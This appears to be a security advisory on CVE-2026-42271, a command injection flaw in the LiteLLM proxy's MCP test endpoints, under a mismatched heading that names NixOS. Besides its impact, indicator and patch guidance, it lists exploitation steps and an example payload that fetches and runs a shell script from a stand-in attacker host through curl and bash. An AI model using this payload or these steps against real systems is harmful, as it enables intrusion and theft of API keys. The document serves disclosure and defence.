CVE-2026-42271: 
NixOS 취약성 분석 및 완화

CVE-2026-42271 is an authenticated command injection vulnerability in LiteLLM (BerriAI), an AI Gateway/proxy server for calling LLM APIs. Affecting versions 1.74.2 through before 1.83.7, the flaw allows any authenticated user holding a valid proxy API key — including low-privilege internal-user keys — to execute arbitrary OS commands on the proxy host. The vulnerability was published on May 8, 2026, and patched in version 1.83.7. It carries a CVSS v3.1 base score of 8.8 (High) and a CVSS v4.0 base score of 8.7 (High) (GitHub Advisory, Feedly).

The root cause is improper neutralization of special elements used in an OS command (CWE-78 / CWE-77), classified as OS Command Injection. Two MCP server test endpoints — POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list — accepted a full server configuration in the request body, including command, args, and env fields used by the stdio transport. When invoked with a stdio-type configuration, the endpoints spawned the supplied command as a subprocess on the proxy host with the privileges of the LiteLLM proxy process. Critically, these endpoints were gated only by a valid proxy API key with no role-based access control (RBAC) check, meaning any authenticated user — not just administrators — could trigger arbitrary command execution (GitHub Advisory). The fix in v1.83.7 restricts both test endpoints to the PROXY_ADMIN role, aligning them with the save endpoint (LiteLLM Release).

Successful exploitation grants an attacker arbitrary command execution on the proxy host with the privileges of the LiteLLM proxy process, resulting in full compromise of confidentiality, integrity, and availability of the affected system. An attacker can exfiltrate sensitive data including LLM API keys, model configurations, and user data stored or accessible by the proxy; modify system files or configurations; or disrupt service availability. When chained with CVE-2026-48710 (a Starlette host header injection flaw), the attack can escalate to unauthenticated remote code execution, significantly broadening the attack surface and enabling lateral movement within enterprise AI infrastructure (Rescana, Horizon3).

1. Reconnaissance: Identify internet-facing LiteLLM proxy instances (versions 1.74.2–1.83.6) using Shodan, Censys, or similar tools by searching for LiteLLM-specific HTTP response headers or API endpoints.
2. Obtain a valid API key: Acquire any valid proxy API key — including low-privilege internal-user keys obtained via free trial, social engineering, or credential theft — since no elevated role is required.
3. Craft the malicious request: Construct a POST request to either /mcp-rest/test/connection or /mcp-rest/test/tools/list with a JSON body specifying a stdio-type MCP server configuration, embedding the desired OS command in the command and args fields. Example payload:

{
  "transport": "stdio",
  "command": "/bin/bash",
  "args": ["-c", "curl http://attacker.com/shell.sh | bash"],
  "env": {}
}

4. Authenticate and send: Include the API key in the Authorization: Bearer <key> header and send the request to the target LiteLLM proxy.
5. Achieve code execution: The proxy spawns the supplied command as a subprocess with its own process privileges, executing the attacker's payload on the host.
6. Chain for unauthenticated access (optional): Combine with CVE-2026-48710 (Starlette host header injection) to bypass authentication requirements entirely, enabling unauthenticated RCE (Horizon3, GitHub Advisory).

• Network: Unexpected outbound connections from the LiteLLM proxy host to external IPs (e.g., attacker C2 servers) shortly after POST requests to /mcp-rest/test/connection or /mcp-rest/test/tools/list; unusual DNS lookups from the proxy process.
• Logs: HTTP access logs showing POST requests to /mcp-rest/test/connection or /mcp-rest/test/tools/list from non-administrative API keys; repeated or automated requests to these endpoints from a single source IP; LiteLLM application logs showing subprocess spawn events with unexpected command strings.
• Process: Unusual child processes spawned by the LiteLLM Python process (e.g., /bin/bash, sh, curl, wget, python, nc) that are not part of normal proxy operation; processes running under the LiteLLM service account performing network connections.
• File System: New or modified files in the LiteLLM installation directory or system temp directories (e.g., dropped scripts, web shells, or binaries); new cron jobs or systemd services created by the proxy service account.
• Registry/Config: Unexpected modifications to LiteLLM configuration files or environment variable files containing new or altered API keys or callback URLs.

Upgrade LiteLLM to version 1.83.7 or later immediately; this release restricts POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list to the PROXY_ADMIN role, eliminating the privilege escalation path (LiteLLM Release, GitHub Advisory). If immediate upgrading is not possible, block POST requests to /mcp-rest/test/connection and /mcp-rest/test/tools/list at your reverse proxy, API gateway, or WAF. Additionally, restrict network access to the LiteLLM proxy to trusted networks only, implement strict API key management by limiting distribution of proxy API keys to only necessary services, and audit existing key holders for unauthorized access. Monitor the affected endpoints for suspicious activity as a compensating control.

CISA added CVE-2026-42271 to its KEV catalog on June 8, 2026, issuing an alert urging immediate remediation (CISA Alert). The Hacker News covered the active exploitation, noting the chaining with CVE-2026-48710 to achieve unauthenticated RCE (The Hacker News). Security researchers on Reddit, Mastodon, and Bluesky highlighted the severity of the vulnerability in AI gateway infrastructure, with some describing it as a "CVSS 10.0 RCE chain" when combined with the Starlette flaw. Horizon3.ai published a detailed attack research post covering the chained exploitation scenario (Horizon3). SOCRadar and HelpNetSecurity also covered the KEV addition and active exploitation context (SOCRadar, HelpNetSecurity).